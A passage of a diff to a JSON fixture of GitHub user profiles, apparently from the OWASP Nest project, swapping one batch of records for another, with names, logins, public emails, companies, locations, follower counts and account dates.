"2024-09-22T08:44:47.414Z", + "nest_updated_at": "2024-09-22T19:29:29.691Z", + "name": "Paul Brabban", + "login": "brabster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38040056?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38702?v=4", + "company": "Tempered Works Ltd.", + "location": "Sheffield, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-04-03T12:32:46Z", - "updated_at": "2021-07-21T13:26:51Z", - "node_id": "MDQ6VXNlcjM4MDQwMDU2", - "bio": "", - "is_hireable": false, + "following_count": 34, + "followers_count": 34, + "public_gists_count": 7, + "public_repositories_count": 74, + "created_at": "2008-12-06T13:41:35Z", + "updated_at": "2024-09-06T05:53:21Z", + "node_id": "MDQ6VXNlcjM4NzAy", + "bio": "Lead Consultant with Equal Experts, specialising in solving data intensive problems with cloud technology", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2136, + "pk": 7455, "fields": { - "nest_created_at": "2024-09-12T01:08:13.237Z", - "nest_updated_at": "2024-09-18T19:04:15.777Z", - "name": "Marco Ochse", - "login": "t3chn0m4g3", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4318452?v=4", - "company": "Telekom Security | Honeynet Project", - "location": "Frankfurt", + "nest_created_at": "2024-09-22T08:44:47.727Z", + "nest_updated_at": "2024-09-22T19:29:30.003Z", + "name": "Cayvon Hamidizadeh", + "login": "CayvonH", + "email": "cayvonhamidi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11383467?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 35, - "followers_count": 203, - "public_gists_count": 5, - "public_repositories_count": 84, - "created_at": "2013-05-02T06:05:26Z", - "updated_at": "2024-09-05T09:09:44Z", - "node_id": "MDQ6VXNlcjQzMTg0NTI=", - "bio": "@telekom-security \r\n@honeynet ", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2015-03-09T03:41:06Z", + "updated_at": "2023-06-26T17:24:28Z", + "node_id": "MDQ6VXNlcjExMzgzNDY3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2137, + "pk": 7456, "fields": { - "nest_created_at": "2024-09-12T01:08:14.938Z", - "nest_updated_at": "2024-09-12T01:08:14.938Z", + "nest_created_at": "2024-09-22T08:44:48.037Z", + "nest_updated_at": "2024-09-22T19:29:30.323Z", "name": "", - "login": "EdilsonGalvao", + "login": "leonardvaughn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7414435?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1742922?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 7, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2014-04-26T14:59:33Z", - "updated_at": "2024-08-09T11:58:46Z", - "node_id": "MDQ6VXNlcjc0MTQ0MzU=", + "public_repositories_count": 0, + "created_at": "2012-05-15T16:55:52Z", + "updated_at": "2021-05-10T23:38:22Z", + "node_id": "MDQ6VXNlcjE3NDI5MjI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413678,24 +672327,49 @@ }, { "model": "github.user", - "pk": 2138, + "pk": 7457, "fields": { - "nest_created_at": "2024-09-12T01:08:15.742Z", - "nest_updated_at": "2024-09-12T01:08:15.742Z", - "name": "Jordan Bondo", - "login": "faithfracture", + "nest_created_at": "2024-09-22T08:44:48.661Z", + "nest_updated_at": "2024-09-22T19:29:30.942Z", + "name": "Chad Dollins", + "login": "cdollins", + "email": "chad.dollins@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23333?v=4", + "company": "Twitter", + "location": "Austin, TX, USA", + "collaborators_count": 0, + "following_count": 50, + "followers_count": 20, + "public_gists_count": 11, + "public_repositories_count": 30, + "created_at": "2008-09-05T18:02:45Z", + "updated_at": "2024-08-17T22:41:36Z", + "node_id": "MDQ6VXNlcjIzMzMz", + "bio": "", + "is_hireable": true, + "twitter_username": "vipaca" + } +}, +{ + "model": "github.user", + "pk": 7458, + "fields": { + "nest_created_at": "2024-09-22T08:44:48.980Z", + "nest_updated_at": "2024-09-22T19:29:31.258Z", + "name": "Jim Berlage", + "login": "jimberlage", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/717745?v=4", - "company": "OpenEye", - "location": "Cheney, WA", + "avatar_url": "https://avatars.githubusercontent.com/u/4751760?v=4", + "company": "@reifyhealth", + "location": "St Louis, MO", "collaborators_count": 0, - "following_count": 12, + "following_count": 26, "followers_count": 18, - "public_gists_count": 1, - "public_repositories_count": 17, - "created_at": "2011-04-08T15:37:42Z", - "updated_at": "2024-08-28T11:21:48Z", - "node_id": "MDQ6VXNlcjcxNzc0NQ==", + "public_gists_count": 2, + "public_repositories_count": 55, + "created_at": "2013-06-20T18:22:40Z", + "updated_at": "2024-02-17T21:08:33Z", + "node_id": "MDQ6VXNlcjQ3NTE3NjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413703,24 +672377,24 @@ }, { "model": "github.user", - "pk": 2139, + "pk": 7459, "fields": { - "nest_created_at": "2024-09-12T01:08:17.440Z", - "nest_updated_at": "2024-09-12T01:08:17.440Z", + "nest_created_at": "2024-09-22T08:44:49.301Z", + "nest_updated_at": "2024-09-22T19:29:31.577Z", "name": "", - "login": "JenniferLaCroix", + "login": "korkeala", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/138414986?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/17471145?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 29, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-07-03T01:40:16Z", - "updated_at": "2024-08-22T10:57:22Z", - "node_id": "U_kgDOCEALig", + "public_repositories_count": 14, + "created_at": "2016-02-25T09:41:22Z", + "updated_at": "2023-10-03T06:13:00Z", + "node_id": "MDQ6VXNlcjE3NDcxMTQ1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413728,74 +672402,74 @@ }, { "model": "github.user", - "pk": 2140, + "pk": 7460, "fields": { - "nest_created_at": "2024-09-12T01:08:18.262Z", - "nest_updated_at": "2024-09-12T01:08:18.262Z", - "name": "Jerimiah Rasmussen", - "login": "Myahr208", + "nest_created_at": "2024-09-22T08:44:49.617Z", + "nest_updated_at": "2024-09-22T19:29:31.917Z", + "name": "Minh Tuan Nguyen", + "login": "minhtuannguyen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/135060040?v=4", - "company": "Green Collars ", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/797876?v=4", + "company": "OTTO GmbH & Co KG", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 75, - "followers_count": 48, - "public_gists_count": 2, - "public_repositories_count": 52, - "created_at": "2023-05-30T18:28:50Z", - "updated_at": "2024-09-08T22:14:00Z", - "node_id": "U_kgDOCAzaSA", - "bio": "Green Collars ", - "is_hireable": false, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2011-05-19T10:32:07Z", + "updated_at": "2024-09-13T11:35:38Z", + "node_id": "MDQ6VXNlcjc5Nzg3Ng==", + "bio": "developer from Hamburg Germany", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2141, + "pk": 7461, "fields": { - "nest_created_at": "2024-09-12T01:08:20.813Z", - "nest_updated_at": "2024-09-18T19:04:44.802Z", - "name": "Code Dx", - "login": "codedx", - "email": "sig-codedx-github@synopsys.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6878202?v=4", + "nest_created_at": "2024-09-22T08:44:49.949Z", + "nest_updated_at": "2024-09-22T19:29:32.225Z", + "name": "", + "login": "s3dse", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11731912?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 13, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2014-03-06T23:32:41Z", - "updated_at": "2024-09-04T22:07:59Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjY4NzgyMDI=", - "bio": "Code Dx is focused on helping developers build and launch applications that can safely brave the hazardous waters of the internet", + "public_repositories_count": 6, + "created_at": "2015-03-31T05:39:03Z", + "updated_at": "2024-04-21T14:10:38Z", + "node_id": "MDQ6VXNlcjExNzMxOTEy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2142, + "pk": 7462, "fields": { - "nest_created_at": "2024-09-12T01:08:24.054Z", - "nest_updated_at": "2024-09-12T02:40:10.554Z", - "name": "", - "login": "skirge", + "nest_created_at": "2024-09-22T08:44:50.269Z", + "nest_updated_at": "2024-09-22T19:29:32.542Z", + "name": "vemv", + "login": "vemv", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/213444?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1162994?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 221, - "followers_count": 11, - "public_gists_count": 2, - "public_repositories_count": 58, - "created_at": "2010-03-01T20:52:50Z", - "updated_at": "2024-09-10T11:46:27Z", - "node_id": "MDQ6VXNlcjIxMzQ0NA==", + "following_count": 0, + "followers_count": 80, + "public_gists_count": 4, + "public_repositories_count": 22, + "created_at": "2011-10-31T17:17:20Z", + "updated_at": "2024-01-07T15:41:53Z", + "node_id": "MDQ6VXNlcjExNjI5OTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413803,24 +672477,24 @@ }, { "model": "github.user", - "pk": 2143, + "pk": 7463, "fields": { - "nest_created_at": "2024-09-12T01:08:25.343Z", - "nest_updated_at": "2024-09-12T01:08:25.343Z", - "name": "", - "login": "deven1rao", + "nest_created_at": "2024-09-22T08:45:03.373Z", + "nest_updated_at": "2024-09-22T19:29:45.553Z", + "name": "Furquan Ahmed", + "login": "furquan1993", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/115809122?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5462231?v=4", "company": "", - "location": "", + "location": "Bhopal, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-10-14T15:41:02Z", - "updated_at": "2022-10-25T11:05:19Z", - "node_id": "U_kgDOBucbYg", + "following_count": 2, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2013-09-15T08:20:20Z", + "updated_at": "2024-08-20T04:20:12Z", + "node_id": "MDQ6VXNlcjU0NjIyMzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413828,24 +672502,49 @@ }, { "model": "github.user", - "pk": 2144, + "pk": 7464, "fields": { - "nest_created_at": "2024-09-12T01:08:26.192Z", - "nest_updated_at": "2024-09-18T19:04:47.443Z", + "nest_created_at": "2024-09-22T08:45:03.694Z", + "nest_updated_at": "2024-09-22T19:29:45.859Z", + "name": "adee", + "login": "addiittya2006", + "email": "mail@adee.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/7330961?v=4", + "company": "", + "location": "IN", + "collaborators_count": 0, + "following_count": 123, + "followers_count": 22, + "public_gists_count": 6, + "public_repositories_count": 32, + "created_at": "2014-04-17T20:56:53Z", + "updated_at": "2024-07-21T17:26:45Z", + "node_id": "MDQ6VXNlcjczMzA5NjE=", + "bio": "(they/them) loves the li'l green droid(@android) and that bright red gem(@ruby). GSoC 2016 @owasp.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7465, + "fields": { + "nest_created_at": "2024-09-22T08:45:04.030Z", + "nest_updated_at": "2024-09-22T19:29:46.208Z", "name": "", - "login": "Babu420-Bhaiya", + "login": "thewayofknowing", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71264555?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4375956?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-09-14T11:32:55Z", - "updated_at": "2023-08-28T11:50:05Z", - "node_id": "MDQ6VXNlcjcxMjY0NTU1", + "following_count": 1, + "followers_count": 4, + "public_gists_count": 3, + "public_repositories_count": 23, + "created_at": "2013-05-08T11:14:12Z", + "updated_at": "2024-07-29T17:52:27Z", + "node_id": "MDQ6VXNlcjQzNzU5NTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413853,24 +672552,24 @@ }, { "model": "github.user", - "pk": 2145, + "pk": 7466, "fields": { - "nest_created_at": "2024-09-12T01:08:27.586Z", - "nest_updated_at": "2024-09-12T01:08:33.061Z", - "name": "", - "login": "stevesalas", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29252545?v=4", + "nest_created_at": "2024-09-22T08:45:04.668Z", + "nest_updated_at": "2024-09-22T19:29:46.861Z", + "name": "Rishabh Makhija", + "login": "rishabh7m", + "email": "rishabh.makhija07@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6622124?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-06-07T11:35:36Z", - "updated_at": "2024-08-09T15:40:11Z", - "node_id": "MDQ6VXNlcjI5MjUyNTQ1", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2014-02-08T04:48:52Z", + "updated_at": "2024-09-14T07:00:03Z", + "node_id": "MDQ6VXNlcjY2MjIxMjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413878,39 +672577,64 @@ }, { "model": "github.user", - "pk": 2146, + "pk": 7467, "fields": { - "nest_created_at": "2024-09-12T01:08:33.995Z", - "nest_updated_at": "2024-09-12T01:08:34.826Z", - "name": "Bobby Ferris", - "login": "baffles", + "nest_created_at": "2024-09-22T08:45:04.982Z", + "nest_updated_at": "2024-09-22T19:29:47.172Z", + "name": "Aleksandar Abu Samra", + "login": "aaleksandar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3181103?v=4", - "company": "", - "location": "New York", + "avatar_url": "https://avatars.githubusercontent.com/u/1390069?v=4", + "company": "Eudaform Labs", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 2, - "followers_count": 27, - "public_gists_count": 1, - "public_repositories_count": 34, - "created_at": "2013-01-03T23:10:26Z", - "updated_at": "2024-09-05T13:55:24Z", - "node_id": "MDQ6VXNlcjMxODExMDM=", + "following_count": 5, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2012-01-30T00:10:25Z", + "updated_at": "2024-09-10T15:52:55Z", + "node_id": "MDQ6VXNlcjEzOTAwNjk=", "bio": "", + "is_hireable": true, + "twitter_username": "aaleksandar" + } +}, +{ + "model": "github.user", + "pk": 7468, + "fields": { + "nest_created_at": "2024-09-22T08:45:05.298Z", + "nest_updated_at": "2024-09-22T19:29:47.485Z", + "name": "Athos Ribeiro", + "login": "athos-ribeiro", + "email": "athoscribeiro@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2052794?v=4", + "company": "@canonical ", + "location": "Brazil", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 53, + "public_gists_count": 6, + "public_repositories_count": 138, + "created_at": "2012-07-27T15:38:38Z", + "updated_at": "2024-09-03T21:48:54Z", + "node_id": "MDQ6VXNlcjIwNTI3OTQ=", + "bio": "Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2147, + "pk": 7469, "fields": { - "nest_created_at": "2024-09-12T01:08:35.707Z", - "nest_updated_at": "2024-09-12T01:08:41.654Z", - "name": "Hassan Radwan", - "login": "leRadwan", + "nest_created_at": "2024-09-22T08:45:05.609Z", + "nest_updated_at": "2024-09-22T19:29:47.822Z", + "name": "", + "login": "mike-is-rooted", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2379469?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/102802811?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -413918,9 +672642,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2012-09-19T16:22:07Z", - "updated_at": "2024-07-15T16:38:11Z", - "node_id": "MDQ6VXNlcjIzNzk0Njk=", + "created_at": "2022-04-01T11:13:40Z", + "updated_at": "2024-06-11T11:20:21Z", + "node_id": "U_kgDOBiClew", "bio": "", "is_hireable": false, "twitter_username": "" @@ -413928,74 +672652,99 @@ }, { "model": "github.user", - "pk": 2148, + "pk": 7470, "fields": { - "nest_created_at": "2024-09-12T01:08:42.445Z", - "nest_updated_at": "2024-09-18T19:04:49.017Z", - "name": "Sam Li", - "login": "yangsec888", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3275355?v=4", - "company": "OWASP", - "location": "Florida, USA", + "nest_created_at": "2024-09-22T08:45:05.926Z", + "nest_updated_at": "2024-09-22T19:29:48.133Z", + "name": "Sanchit Gupta", + "login": "sanchitgupta001", + "email": "sanchit.gupta011@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11902742?v=4", + "company": "", + "location": "Jammu, Jammu & Kasmir , India", "collaborators_count": 0, - "following_count": 5, - "followers_count": 6, + "following_count": 9, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2013-01-15T13:17:15Z", - "updated_at": "2024-08-23T13:36:31Z", - "node_id": "MDQ6VXNlcjMyNzUzNTU=", - "bio": "Security monkey; jack of all trades ...", + "public_repositories_count": 76, + "created_at": "2015-04-11T17:42:09Z", + "updated_at": "2024-05-04T13:24:22Z", + "node_id": "MDQ6VXNlcjExOTAyNzQy", + "bio": "Tech Geek! Always looking forward to learning and contributing to new Projects", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7471, + "fields": { + "nest_created_at": "2024-09-22T08:46:58.362Z", + "nest_updated_at": "2024-09-22T19:32:08.315Z", + "name": "Alexandre Menezes", + "login": "amenezes", + "email": "alexandre.fmenezes@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/752980?v=4", + "company": "@supremotribunalfederal ", + "location": "Brasília, BR", + "collaborators_count": 0, + "following_count": 136, + "followers_count": 29, + "public_gists_count": 8, + "public_repositories_count": 53, + "created_at": "2011-04-26T17:43:03Z", + "updated_at": "2024-09-21T11:23:27Z", + "node_id": "MDQ6VXNlcjc1Mjk4MA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2149, + "pk": 7472, "fields": { - "nest_created_at": "2024-09-12T01:08:54.328Z", - "nest_updated_at": "2024-09-18T19:06:23.118Z", - "name": "DefectDojo", - "login": "DefectDojo", - "email": "info@defectdojo.com", - "avatar_url": "https://avatars.githubusercontent.com/u/35606478?v=4", - "company": "", + "nest_created_at": "2024-09-22T08:46:58.987Z", + "nest_updated_at": "2024-09-22T19:31:41.864Z", + "name": "David Ragsdale", + "login": "djragsdale", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4396766?v=4", + "company": "Aptiv", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 143, - "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2018-01-19T16:22:27Z", - "updated_at": "2024-02-26T02:25:06Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjM1NjA2NDc4", - "bio": "Open Source DevSecOps, ASPM & Vulnerability Management.", + "following_count": 18, + "followers_count": 5, + "public_gists_count": 8, + "public_repositories_count": 39, + "created_at": "2013-05-10T13:32:25Z", + "updated_at": "2024-09-17T20:42:10Z", + "node_id": "MDQ6VXNlcjQzOTY3NjY=", + "bio": "", "is_hireable": false, - "twitter_username": "defectdojo" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2150, + "pk": 7473, "fields": { - "nest_created_at": "2024-09-12T01:09:13.941Z", - "nest_updated_at": "2024-09-12T01:19:16.876Z", - "name": "Cody Maffucci", - "login": "Maffooch", + "nest_created_at": "2024-09-22T08:47:20.169Z", + "nest_updated_at": "2024-09-22T19:32:02.653Z", + "name": "Calgary Michael", + "login": "CalgaryMichael", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46459665?v=4", - "company": "@DefectDojo-Inc ", - "location": "Cypress, TX", + "avatar_url": "https://avatars.githubusercontent.com/u/8285462?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 17, + "following_count": 2, + "followers_count": 8, "public_gists_count": 2, - "public_repositories_count": 6, - "created_at": "2019-01-07T20:07:01Z", - "updated_at": "2024-09-06T22:08:02Z", - "node_id": "MDQ6VXNlcjQ2NDU5NjY1", + "public_repositories_count": 25, + "created_at": "2014-07-28T02:52:21Z", + "updated_at": "2024-09-20T15:13:21Z", + "node_id": "MDQ6VXNlcjgyODU0NjI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414003,24 +672752,24 @@ }, { "model": "github.user", - "pk": 2151, + "pk": 7474, "fields": { - "nest_created_at": "2024-09-12T01:09:26.616Z", - "nest_updated_at": "2024-09-12T01:09:27.478Z", - "name": "Raghu", - "login": "raghunath24", + "nest_created_at": "2024-09-22T08:47:20.490Z", + "nest_updated_at": "2024-09-22T19:32:02.964Z", + "name": "", + "login": "JensSkipr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38399884?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/62247524?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 12, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-04-15T12:57:20Z", - "updated_at": "2019-09-23T06:25:15Z", - "node_id": "MDQ6VXNlcjM4Mzk5ODg0", + "public_repositories_count": 4, + "created_at": "2020-03-16T13:06:20Z", + "updated_at": "2023-08-23T07:45:07Z", + "node_id": "MDQ6VXNlcjYyMjQ3NTI0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414028,24 +672777,24 @@ }, { "model": "github.user", - "pk": 2152, + "pk": 7475, "fields": { - "nest_created_at": "2024-09-12T01:09:28.286Z", - "nest_updated_at": "2024-09-12T01:09:28.286Z", - "name": "", - "login": "sirferl", + "nest_created_at": "2024-09-22T08:47:40.461Z", + "nest_updated_at": "2024-09-22T19:32:23.597Z", + "name": "Dylan Halperin", + "login": "dylemma", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41906265?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1355958?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-07-30T12:36:17Z", - "updated_at": "2022-11-23T07:39:31Z", - "node_id": "MDQ6VXNlcjQxOTA2MjY1", + "followers_count": 12, + "public_gists_count": 7, + "public_repositories_count": 39, + "created_at": "2012-01-19T23:22:00Z", + "updated_at": "2024-08-14T16:12:12Z", + "node_id": "MDQ6VXNlcjEzNTU5NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414053,24 +672802,24 @@ }, { "model": "github.user", - "pk": 2153, + "pk": 7476, "fields": { - "nest_created_at": "2024-09-12T01:09:29.107Z", - "nest_updated_at": "2024-09-12T01:09:29.107Z", + "nest_created_at": "2024-09-22T08:47:41.097Z", + "nest_updated_at": "2024-09-22T19:32:24.233Z", "name": "", - "login": "heepspray", + "login": "Lumifly", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43822156?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1163259?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-10-03T16:08:52Z", - "updated_at": "2019-03-01T12:42:55Z", - "node_id": "MDQ6VXNlcjQzODIyMTU2", + "public_repositories_count": 1, + "created_at": "2011-10-31T19:18:41Z", + "updated_at": "2024-01-07T21:21:31Z", + "node_id": "MDQ6VXNlcjExNjMyNTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414078,49 +672827,49 @@ }, { "model": "github.user", - "pk": 2154, + "pk": 7477, "fields": { - "nest_created_at": "2024-09-12T01:09:29.960Z", - "nest_updated_at": "2024-09-12T01:09:29.960Z", - "name": "Pedro Galindo", - "login": "p3r1c0", - "email": "p3r1c0labs@outlook.es", - "avatar_url": "https://avatars.githubusercontent.com/u/19948149?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:13.024Z", + "nest_updated_at": "2024-09-22T19:32:56.172Z", + "name": "Oliver Dunk", + "login": "oliverdunk", + "email": "oliver@oliverdunk.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6097064?v=4", + "company": "@Google", + "location": "United Kingdom", "collaborators_count": 0, "following_count": 4, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2016-06-15T08:56:22Z", - "updated_at": "2024-07-31T12:48:36Z", - "node_id": "MDQ6VXNlcjE5OTQ4MTQ5", - "bio": "share&learn&enjoy", - "is_hireable": false, - "twitter_username": "" + "followers_count": 187, + "public_gists_count": 2, + "public_repositories_count": 68, + "created_at": "2013-12-03T16:22:35Z", + "updated_at": "2024-09-15T20:52:33Z", + "node_id": "MDQ6VXNlcjYwOTcwNjQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "oliverdunk_" } }, { "model": "github.user", - "pk": 2155, + "pk": 7478, "fields": { - "nest_created_at": "2024-09-12T01:09:30.785Z", - "nest_updated_at": "2024-09-12T01:21:44.342Z", - "name": "", - "login": "barbich", + "nest_created_at": "2024-09-22T08:48:13.350Z", + "nest_updated_at": "2024-09-22T19:32:56.481Z", + "name": "Mitchell Cohen", + "login": "mitchchn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1044555?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7342119?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 2, + "following_count": 2, + "followers_count": 29, "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2011-09-12T14:16:29Z", - "updated_at": "2024-08-14T20:00:24Z", - "node_id": "MDQ6VXNlcjEwNDQ1NTU=", + "public_repositories_count": 25, + "created_at": "2014-04-18T22:36:38Z", + "updated_at": "2024-09-03T23:18:40Z", + "node_id": "MDQ6VXNlcjczNDIxMTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414128,74 +672877,149 @@ }, { "model": "github.user", - "pk": 2156, + "pk": 7479, "fields": { - "nest_created_at": "2024-09-12T01:09:32.496Z", - "nest_updated_at": "2024-09-12T01:09:32.496Z", - "name": "Michal Wiczynski", - "login": "wheelq", + "nest_created_at": "2024-09-22T08:48:13.671Z", + "nest_updated_at": "2024-09-22T19:32:56.794Z", + "name": "Roustem Karimov", + "login": "roustem", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1497172?v=4", - "company": "", - "location": "United Kingdom", + "avatar_url": "https://avatars.githubusercontent.com/u/104145?v=4", + "company": "@AgileBits", + "location": "Toronto, Canada", "collaborators_count": 0, - "following_count": 60, + "following_count": 14, + "followers_count": 78, + "public_gists_count": 54, + "public_repositories_count": 68, + "created_at": "2009-07-12T14:13:32Z", + "updated_at": "2024-09-08T22:32:03Z", + "node_id": "MDQ6VXNlcjEwNDE0NQ==", + "bio": "Founder of AgileBits. Developer of 1Password and 1Password.com", + "is_hireable": false, + "twitter_username": "roustem" + } +}, +{ + "model": "github.user", + "pk": 7480, + "fields": { + "nest_created_at": "2024-09-22T08:48:13.995Z", + "nest_updated_at": "2024-09-22T19:32:57.102Z", + "name": "Jacob Penderworth", + "login": "Penderworth", + "email": "jacob@agilebits.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6487393?v=4", + "company": "1Password", + "location": "Portland, OR", + "collaborators_count": 0, + "following_count": 2, "followers_count": 12, - "public_gists_count": 70, - "public_repositories_count": 245, - "created_at": "2012-03-03T18:00:54Z", - "updated_at": "2024-08-20T11:23:15Z", - "node_id": "MDQ6VXNlcjE0OTcxNzI=", - "bio": "Dev(Sec)Ops\r\n\r\nGists: https://gist.github.com/wheelq", - "is_hireable": true, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-01-24T01:36:52Z", + "updated_at": "2024-08-23T15:40:49Z", + "node_id": "MDQ6VXNlcjY0ODczOTM=", + "bio": "Technical Writer @1Password.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2157, + "pk": 7481, "fields": { - "nest_created_at": "2024-09-12T01:09:33.372Z", - "nest_updated_at": "2024-09-12T01:09:33.372Z", - "name": "Cyril Levis", - "login": "cyrinux", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/519083?v=4", - "company": "Dailymotion", - "location": "Internet", + "nest_created_at": "2024-09-22T08:48:14.308Z", + "nest_updated_at": "2024-09-22T19:32:57.412Z", + "name": "Brend Smits", + "login": "Brend-Smits", + "email": "brend.smits@philips.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15904543?v=4", + "company": "@philips-software", + "location": "Eindhoven, Netherlands", "collaborators_count": 0, - "following_count": 243, - "followers_count": 64, - "public_gists_count": 11, - "public_repositories_count": 280, - "created_at": "2010-12-11T15:11:17Z", - "updated_at": "2024-09-02T19:57:22Z", - "node_id": "MDQ6VXNlcjUxOTA4Mw==", - "bio": "0x6A11D19BDD5F8B5E | IT, Hacker", + "following_count": 129, + "followers_count": 66, + "public_gists_count": 9, + "public_repositories_count": 73, + "created_at": "2015-11-18T08:40:51Z", + "updated_at": 